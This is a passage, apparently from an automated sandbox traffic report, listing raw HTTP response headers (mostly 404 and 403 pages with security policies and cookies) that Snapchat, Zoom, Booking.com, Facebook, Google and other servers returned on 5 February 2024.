https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:16:07 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=7ca24f3b5c0f003b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilMYde8P2VbypUEfLchvSEFGAJezDrMX5xOf59abzqp9DKM_9-kmek_KAcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=7ca24f3b5c0f003b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilMYde8P2VbypUEfLchvSEFGAJezDrMX5xOf59abzqp9DKM_9-kmek_KA; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-qg33KKQUzYnzfDG' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 57674a900f587a3a1f1571205e001c6c.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL59-P5X-Amz-Cf-Id: UJ-tXhDVustfeRTAoDJdwDRthW-1YUhMwnI7BBaVXt6BJ-zAFdwIOA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:08 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closex-zm-trackingid: v=2.0;clid=aw1;rid=WEB_6455cff9bec81e85c104a918f9ef0987x-content-type-options: nosniffcontent-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-BCeN5OvgRbWKWthsB8G9pg' 'unsafe-inline' blob: https:;x-frame-options: SAMEORIGINset-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockCF-Cache-Status: HITServer: cloudflareCF-RAY: 850abd515c5db029-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlNgrok-Error-Code: ERR_NGROK_3200Ngrok-Trace-Id: c2e440e820bef3ad20b52a5585ed00edReferrer-Policy: no-referrerDate: Mon, 05 Feb 2024 11:16:10 GMTTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTServer: Apache/2.4.41 (Ubuntu)Expires: 0Cache-Control: no-cache, no-store, max-age=0, must-revalidateX-Powered-By: JSP/2.2Set-Cookie: JSESSIONID=w0MJPTHCHLZiEcNbGbud2a8h.cmrsanmartin; path=/X-XSS-Protection: 1; mode=blockPragma: no-cacheX-Frame-Options: SAMEORIGINX-Robots-Tag: noindex,noarchiveX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000 ; includeSubDomainsContent-Type: text/html;charset=UTF-8Content-Language: es-CLConnection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 12972Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 850abd5c3f561d62-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cachex-imvu-rnd: cE3wuo3TA1SD1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8vary: Accept-Encodingset-cookie: sc-wcid=b740351c-8fe3-4e92-abf0-9c45e891561b; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; Secureexpires: Thu, 01 Jan 1970 00:00:00 GMTstrict-transport-security: max-age=31536000; includeSubdomainsx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-frame-options: allow-from https://iframe.arkoselabs.comcache-control: no-cache, no-store, max-age=0content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closex-zm-trackingid: v=2.0;clid=us04;rid=WEB_c5bf5ac2aebc8892112b64213b1f192dx-content-type-options: nosniffcontent-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-smzSSlJ9TB-BNoLtyBrhWQ' 'unsafe-inline' blob: https:;x-frame-options: SAMEORIGINset-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 05 Feb 2024 11:17:36 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/htmlContent-Length: 7358Connection: closeServer: nginx/1.12.2Vary: Accept-EncodingETag: "5df8f9a3-1cbe"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingSet-Cookie: fr=0RMlcudAnFvKbatpJ..BlwMN6.Hq.AAA.0.0.BlwMN6.AWWgnHCw83c; expires=Sun, 05-May-2024 11:16:10 GMT; Max-Age=7776000; path=/; domain=.facebook.com; secure; httponlyreporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0"report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlNgrok-Error-Code: ERR_NGROK_3200Ngrok-Trace-Id: 7e51c86663c7b523fa199cebb69dfc45Referrer-Policy: no-referrerDate: Mon, 05 Feb 2024 11:16:10 GMTTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTServer: Apache/2.4.41 (Ubuntu)Expires: 0Cache-Control: no-cache, no-store, max-age=0, must-revalidateX-Powered-By: JSP/2.2Set-Cookie: JSESSIONID=dw-1Bdqxl86HApBORrnH4OZj.cmrsanmartin; path=/X-XSS-Protection: 1; mode=blockPragma: no-cacheX-Frame-Options: SAMEORIGINX-Robots-Tag: noindex,noarchiveX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000 ; includeSubDomainsContent-Type: text/html;charset=UTF-8Content-Language: es-CLConnection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETStrict-Transport-Security: max-age=31536000; includeSubDomainsDate: Mon, 05 Feb 2024 11:16:09 GMTConnection: closeContent-Length: 1245X-CDN: ImpervaX-Iinfo: 32-27693990-27694186 NNNY CT(119 138 0) RT(1707131768430 1678) q(0 0 0 -1) r(0 1) U24
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTServer: ApacheX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 954Connection: closeContent-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Frame-Options: SAMEORIGIN
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:16:10 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=efa84f3d83ca000a&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgcLIf0TMqzdZ8YCpErSRx-VJ_NHvJY3I5Gv8mJys8gdUXLaeE-pi64gcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=efa84f3d83ca000a&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgcLIf0TMqzdZ8YCpErSRx-VJ_NHvJY3I5Gv8mJys8gdUXLaeE-pi64g; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-G7uy4pm4OGXJyfV' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 cc32f91d3d591d364f0c4e44eaf6525e.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL59-P5X-Amz-Cf-Id: uFTx0EgRNNejU_cEiOeYjjvxbjwDYmshtbmPo_p877ZYL7_CKRSNgg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.18.0 (Ubuntu)date: Mon, 05 Feb 2024 11:16:10 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedvary: Accept-Encodingconnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 850abd5e0b5d6761-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8vary: Accept-Encodingset-cookie: sc-wcid=4d4d0a93-e2f4-414f-b79d-51d5c62a9c21; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; Secureexpires: Thu, 01 Jan 1970 00:00:00 GMTstrict-transport-security: max-age=31536000; includeSubdomainsx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-frame-options: allow-from https://iframe.arkoselabs.comcache-control: no-cache, no-store, max-age=0content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 12941Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 850abd5e6b99b12d-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, privateContent-Type: text/html; charset=UTF-8date: Mon, 05 Feb 2024 11:16:10 GMTServer: nginxVary: Accept-EncodingContent-Length: 6854Connection: Close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/htmlContent-Length: 7358Connection: closeServer: nginx/1.12.2Vary: Accept-EncodingETag: "5df8f9a3-1cbe"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fHNpvv4Bwpgi0SRkZIE5qxU9OhTs1h9ch5BZmyd5PC9pSDNwl8XXx4dDYwesaUwPvCMWoqoY324991cqkQBWQIg8mY71MhgKhG03j6PglZUJ1wHDOXJ6MHxHIWakTAnPMPjG7B9Y0xE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd5cd91a0701-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachewww-authenticate: Basic realm="EnterPassword"x-frame-options: SAMEORIGINx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L9kkyoQvPW6fSkIWqiKcni1N2rwwLhWOAFaSnzsPKS%2Fu9w8OCMBE65DYS5%2FsHV43WABcgJC%2FIULWQFh2R20KsNjlQQSw9W9EtqUMOczeY4UdD%2FJPQXxyDF41s2713Xc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd5eb8c94566-ATLalt-svc: h3=":443"; ma=86400
